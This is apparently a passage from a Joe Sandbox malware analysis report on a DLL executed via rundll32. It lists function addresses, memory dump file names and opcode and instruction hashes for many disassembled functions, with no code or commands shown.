                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a254521a49c677627c776f2fd93501501f7019c8d69e557e94d823fb73d932ec
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5631B872208B9486EB618F29E0817AD7BA0F39DF8CF248115DB8D47751CF36C156CB05
                                                                                                                                                                                                                            Function 000000018001FAC8 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 6a8b025e400832db42c02f3a2f9e98f6ef4b0bf48f8fe73726e4d3bae0ec6bd4
                                                                                                                                                                                                                            • Instruction ID: 3219b1075553ffbc29bd8bd7b3c2875f6ca9e1f0d25b2e197bacd4b1c30db385
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a8b025e400832db42c02f3a2f9e98f6ef4b0bf48f8fe73726e4d3bae0ec6bd4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27316FB2208A84C6EB618F29D0903AD77A0F79DB9CF648126DB8C4B751DF36C556C704
                                                                                                                                                                                                                            Function 000000018001DB10 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 2eba2bf4f14ff65b4febd5447a41707e7a761e23eadabbce3d3d16c1bf45bf8b
                                                                                                                                                                                                                            • Instruction ID: 2864fe09f3218442151195c7ea395c6207a09014bd4b95324dc8abfd1de20cbd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2eba2bf4f14ff65b4febd5447a41707e7a761e23eadabbce3d3d16c1bf45bf8b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B319572208B48C6EB618F29D0803AD77A0F79DB8CF658126EB8D4B751DF36C196CB44
                                                                                                                                                                                                                            Function 000000018001EB58 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 666f94b4c324e89dde5076f12b2796057f566c1d694665cea945ec535cee8b7e
                                                                                                                                                                                                                            • Instruction ID: e6f112470b094ccd35d94b1788007629c1fe45d167d9efc7ec63d0d80b727f52
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 666f94b4c324e89dde5076f12b2796057f566c1d694665cea945ec535cee8b7e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61319172208B8486EB658F29E4903AD7BA0F39DF8CF248126EB8D4B751CF36C156C704
                                                                                                                                                                                                                            Function 000000018001CB88 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: c83c8911d6a28bf5315b290536e34167d8ab44819992f744e7ca7cbbcd317d54
                                                                                                                                                                                                                            • Instruction ID: e3caac9a5355b8ead79224f3f29d940676bd107eb710ee410af4d852f5da6b41
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c83c8911d6a28bf5315b290536e34167d8ab44819992f744e7ca7cbbcd317d54
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8319872204B84C6EBA18F29E0407AD77A0F39DB8CF248125EB8D4B751DF36C596DB49
                                                                                                                                                                                                                            Function 000000018001FBD0 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 875cbf7b7b1d93c740d24401c2284ff8ae7908f55e7d6854f88a2f3037e3a53e
                                                                                                                                                                                                                            • Instruction ID: 0dd20db869473c68f8036a2794b100011d6e7baa5c7b988dd7837e1f683c21ce
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 875cbf7b7b1d93c740d24401c2284ff8ae7908f55e7d6854f88a2f3037e3a53e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C3171B2204E48C6EB658F29D1813AD77A0F78DB8CF258125DB8C4B751CF36C556DB44
                                                                                                                                                                                                                            Function 000000018001DC18 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: d48db56637ddef749d029058775811a692de89e9a6525359cda9905c6a363d8b
                                                                                                                                                                                                                            • Instruction ID: ab429fe62d4720b15db0180d7c998276ffdd5d9393d68154bd2f329ba49eda93
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d48db56637ddef749d029058775811a692de89e9a6525359cda9905c6a363d8b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35318472204B88C6EBA58F29E0813AD77A0F78DB8CF258126EB4C4B751CF36C196D744
                                                                                                                                                                                                                            Function 000000018001EC60 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: aa95556cfa9ff7343852d3fbd6a8fe2e314ba3d8c4d9c429b78d81fee79ad27e
                                                                                                                                                                                                                            • Instruction ID: e7831f35239c0f568985306f3e3e0707a4ca3d7f00e7e0929cbe5becda0185d1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa95556cfa9ff7343852d3fbd6a8fe2e314ba3d8c4d9c429b78d81fee79ad27e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC317172204B98C6EB658F29E4503AD7BA0F79EB8CF258126EB4C4B751CF36C156CB04
                                                                                                                                                                                                                            Function 000000018001CC90 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 1964baec96956f892e6203e76eab5b4969056fd1643145ef955a9e88754c99ec
                                                                                                                                                                                                                            • Instruction ID: 88f57e57f347a8418113958807297c111dc03e18e3fb2e44c83c4004166c2925
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1964baec96956f892e6203e76eab5b4969056fd1643145ef955a9e88754c99ec
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1931C872204B84C6DBA18F29E0407AD7BA0F78DB8CF248125EB8C4B751CF36C596CB05
                                                                                                                                                                                                                            Function 000000018001FD28 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: a017be94b9d068a61e02d12c2cc4324c50247f8930cb8fa5ccd183391be106f2
                                                                                                                                                                                                                            • Instruction ID: df90e0fd50cd5d79230831a598737eadb20a6df069e4a62da7289230863c360c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a017be94b9d068a61e02d12c2cc4324c50247f8930cb8fa5ccd183391be106f2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B318272204A9486EB658F29E0403BD77A0F79DB8CF258115EB8C4B761DF36C596DB04
                                                                                                                                                                                                                            Function 000000018001ED68 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 0da7e9209479ef0cb63439bf8a2a90352237857cb9c3176e763d75088f004d9a
                                                                                                                                                                                                                            • Instruction ID: db2f8203021b2f7f68f8e77b5c8ae95fefbc7fb82e60ca50742b629a8a6c953c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0da7e9209479ef0cb63439bf8a2a90352237857cb9c3176e763d75088f004d9a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33315E72204B88C6EBA18F29E0803AD77A4F79DB8CF648126EB4D4B751DF36C596C704
                                                                                                                                                                                                                            Function 000000018001DD70 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 5f439ca86a7326d61d939cae9c704612729db203c6f751910fb396272f7d67cf
                                                                                                                                                                                                                            • Instruction ID: b25c6896c8672aa0923261d7f9bd5283857fe95a8bc3f62d983be6ae4e7c87be
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f439ca86a7326d61d939cae9c704612729db203c6f751910fb396272f7d67cf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA316F72204B88C6EB659F29E4503AD7BA0E39DF8CF258126EB4C4B751DF36C596CB04
                                                                                                                                                                                                                            Function 000000018001CDE8 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 0d4d6af22ca999d21a700d3555551ee3f82a26e003b7e75654d69506ed44b59d
                                                                                                                                                                                                                            • Instruction ID: 77d346011149316ac04a5f4697daabb2f9c63c20d0fdd9667b8ae56fa03a0746
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d4d6af22ca999d21a700d3555551ee3f82a26e003b7e75654d69506ed44b59d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2317172205B8486EB618F29D4407AD77A0F39DF8CF258125EB8D4B751CF36C596CB04
                                                                                                                                                                                                                            Function 000000018001FE30 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: e19daeb74bf998052274caa8c3fece16ab216064d37a3e4ceadee2411425eee4
                                                                                                                                                                                                                            • Instruction ID: 5ae4c679862ac4b5d53e18a49174412fc11ab915ff4b52d9b5f8e02d2e733bf6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e19daeb74bf998052274caa8c3fece16ab216064d37a3e4ceadee2411425eee4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1431A472204A88C6DB618F29D0403AD77A0F79DF8CF258125EB4C4B761DF36C596C704
                                                                                                                                                                                                                            Function 000000018001EE70 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: c133b63652da1cf420c36a20650b5ec01119e36efb72f334426be63db447dc76
                                                                                                                                                                                                                            • Instruction ID: 293a194a163537fc14de887b3f2b69d9f7e604321f784b6d35d21f95387c56b7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c133b63652da1cf420c36a20650b5ec01119e36efb72f334426be63db447dc76
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93319172604A88C6EB658F29D0403AD77A0F78DB8CF65812AEB8C4B751CF36C156C704
